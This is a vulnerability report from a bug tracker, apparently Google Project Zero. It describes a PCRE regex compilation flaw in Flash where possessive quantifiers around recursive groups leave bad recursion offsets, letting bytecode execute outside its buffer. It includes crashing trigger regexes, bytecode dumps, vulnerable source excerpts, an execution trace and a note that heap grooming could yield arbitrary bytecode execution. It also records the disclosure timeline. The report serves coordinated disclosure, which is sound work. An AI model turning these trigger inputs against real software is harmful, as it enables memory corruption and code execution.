|
|
Flash PCRE regex compilation recursion offset arbitrary bytecode execution | ||||
| Project Member Reported by markbrand@google.com, Dec 10 2014 | Back to list | ||||
There’s an error in the PCRE engine version used in Flash that allows the execution of arbitrary PCRE bytecode, with potential for memory corruption and RCE.
The issue occurs in the handling of recursive calls to possessively-repeated groups.
Simplest testcase that will crash in an ASAN build of of avmshell is the following:
(A(?1))*+
This compiles to the following:
0000 5d001d BRA [29]
0003 5c0017 ONCE [23]
0006 66 BRAZERO
0007 5e00100001 CBRA [16, 1]
000c 1c41 CHARNC ['A']
000e 5c0006 ONCE [6]
0011 510004 RECURSE [4]
0014 540006 KET [6]
0017 550010 KETRMAX [16]
001a 540017 KET [23]
001d 54001d KET [29]
0020 00 END
Looking at the following two regexes compiled, the issue is clear
(A)
0000 5d000d BRA [13]
0003 5e00070001 CBRA [7, 1]
0008 1c41 CHARNC ['A']
000a 540007 KET [7]
000d 54000d KET [13]
0010 00 END
(A(?1))
0000 5d0016 BRA [22]
0003 5e00100001 CBRA [16, 1]
0008 1c41 CHARNC ['A']
000a 5c0006 ONCE [6]
000d 510003 RECURSE [3]
0010 540006 KET [6]
0013 540010 KET [16]
0016 540016 KET [22]
0019 00 END
We have inserted an OP_RECURSE opcode, and when we go back to add the OP_BRAZERO and OP_ONCE for the *+ quantifier, we fail to correctly adjust the offset of the OP_RECURSE. The cause of this can be seen in pcre_exec.cpp; the following code is used to insert the OP_BRAZERO instruction:
pcre_exec.cpp:4067
/* If the maximum is 1 or unlimited, we just have to stick in the
BRAZERO and do no more at this point. However, we do need to adjust
any OP_RECURSE calls inside the group that refer to the group itself or
any internal or forward referenced group, because the offset is from
the start of the whole regex. Temporarily terminate the pattern while
doing this. */
if (repeat_max <= 1)
{
*code = OP_END;
adjust_recurse(previous, 1, utf8, cd, save_hwm);
VMPI_memmove(previous+1, previous, len);
code++;
*previous++ = OP_BRAZERO + repeat_type;
}
/* If the maximum is greater than 1 and limited, we have to replicate
in a nested fashion, sticking OP_BRAZERO before each set of brackets.
The first one has to be handled carefully because it's the original
copy, which has to be moved up. The remainder can be handled by code
that is common with the non-zero minimum case below. We have to
adjust the value or repeat_max, since one less copy is required. Once
again, we may have to adjust any OP_RECURSE calls inside the group. */
else
{
int offset;
*code = OP_END;
adjust_recurse(previous, 2 + LINK_SIZE, utf8, cd, save_hwm);
VMPI_memmove(previous + 2 + LINK_SIZE, previous, len);
code += 2 + LINK_SIZE;
*previous++ = OP_BRAZERO + repeat_type;
*previous++ = OP_BRA;
/* We chain together the bracket offset fields that have to be
filled in later when the ends of the brackets are reached. */
offset = (bralink == NULL)? 0 : previous - bralink;
bralink = previous;
PUTINC(previous, 0, offset);
}
repeat_max--;
}
Which correctly adjusts our OP_RECURSE offsets; however when we insert the OP_ONCE:
pcre_exec.cpp:4300
/* If the character following a repeat is '+', or if certain optimization
tests above succeeded, possessive_quantifier is TRUE. For some of the
simpler opcodes, there is an special alternative opcode for this. For
anything else, we wrap the entire repeated item inside OP_ONCE brackets.
The '+' notation is just syntactic sugar, taken from Sun's Java package,
but the special opcodes can optimize it a bit. The repeated item starts at
tempcode, not at previous, which might be the first part of a string whose
(former) last char we repeated.
Possessifying an 'exact' quantifier has no effect, so we can ignore it. But
an 'upto' may follow. We skip over an 'exact' item, and then test the
length of what remains before proceeding. */
if (possessive_quantifier)
{
int len;
if (*tempcode == OP_EXACT || *tempcode == OP_TYPEEXACT ||
*tempcode == OP_NOTEXACT)
tempcode += _pcre_OP_lengths[*tempcode];
len = code - tempcode;
if (len > 0) switch (*tempcode)
{
case OP_STAR: *tempcode = OP_POSSTAR; break;
case OP_PLUS: *tempcode = OP_POSPLUS; break;
case OP_QUERY: *tempcode = OP_POSQUERY; break;
case OP_UPTO: *tempcode = OP_POSUPTO; break;
case OP_TYPESTAR: *tempcode = OP_TYPEPOSSTAR; break;
case OP_TYPEPLUS: *tempcode = OP_TYPEPOSPLUS; break;
case OP_TYPEQUERY: *tempcode = OP_TYPEPOSQUERY; break;
case OP_TYPEUPTO: *tempcode = OP_TYPEPOSUPTO; break;
case OP_NOTSTAR: *tempcode = OP_NOTPOSSTAR; break;
case OP_NOTPLUS: *tempcode = OP_NOTPOSPLUS; break;
case OP_NOTQUERY: *tempcode = OP_NOTPOSQUERY; break;
case OP_NOTUPTO: *tempcode = OP_NOTPOSUPTO; break;
default:
VMPI_memmove(tempcode + 1+LINK_SIZE, tempcode, len);
code += 1 + LINK_SIZE;
len += 1 + LINK_SIZE;
tempcode[0] = OP_ONCE;
*code++ = OP_KET;
PUTINC(code, 0, len);
PUT(tempcode, 1, len);
break;
}
}
We will then start our recursed execution at offset 5, which is conveniently controlled by us, as it is the length of the ‘OP_ONCE’ group.
A regex that achieves a more useful consequence is the following:
(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(?1))*+
Which compiles to
0000 5d0057 BRA [87]
0003 5c0051 ONCE [81]
0006 66 BRAZERO
0007 5e004a0001 CBRA [74, 1]
000c 1c41 CHARNC ['A']
...
0046 1c41 CHARNC ['A']
0048 5c0006 ONCE [6]
004b 510004 RECURSE [4]
004e 540006 KET [6]
0051 55004a KETRMAX [74]
0054 540051 KET [81]
0057 540057 KET [87]
005a 00 END
This makes the length of our initial match group 81, so that when the offcut recursion occurs we get the following:
0004 00 END
0005 51665e RECURSE [26206]
This will cause the execution of regex bytecode to leave the legitimate bytecode buffer and jump forward by 0x665e bytes; see an execution trace below:
...
exec 0x1df60f8 92 [0x1df605e 41]
exec 0x1df60fb 81 [0x1df605e 41] <--- legitimate OP_RECURSE
recurse callpat = 31416500
Recursing into group 24064
exec 0x1df60b5 81 [0x1df605e 41] <--- offcut execution
recurse callpat = 31442702
Recursing into group 0
exec 0x1dfc70f 0 [0x1df605e 41] <--- execution has left legitimate bytecode
exec 0x1df60b8 0 [0x1df605e 41]
exec 0x1df6101 85 [0x1df605e 41]
As our bytecode buffer here was at 0x1df60b0 and had length 91, we can see that 0x1dfc70f is well outside this buffer, and we have continued execution because the heap layout has been kind to us. Together with a heap groom, this can be used to achieve arbitrary regex bytecode execution.
This bug was found using AFL, written by lcamtuf.
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
Project Member
Comment 1
by
markbrand@google.com,
Dec 10 2014
,
Dec 18 2014
Supplied a crash poc to adobe.
,
Mar 5 2015
Adobe requested a 2-day grace period because this patch is coming out on Thursday 12th March (two days after Patch Tuesday).
,
Mar 6 2015
,
Mar 12 2015
,
Mar 19 2015
|
|||||
| ► Sign in to add a comment | |||||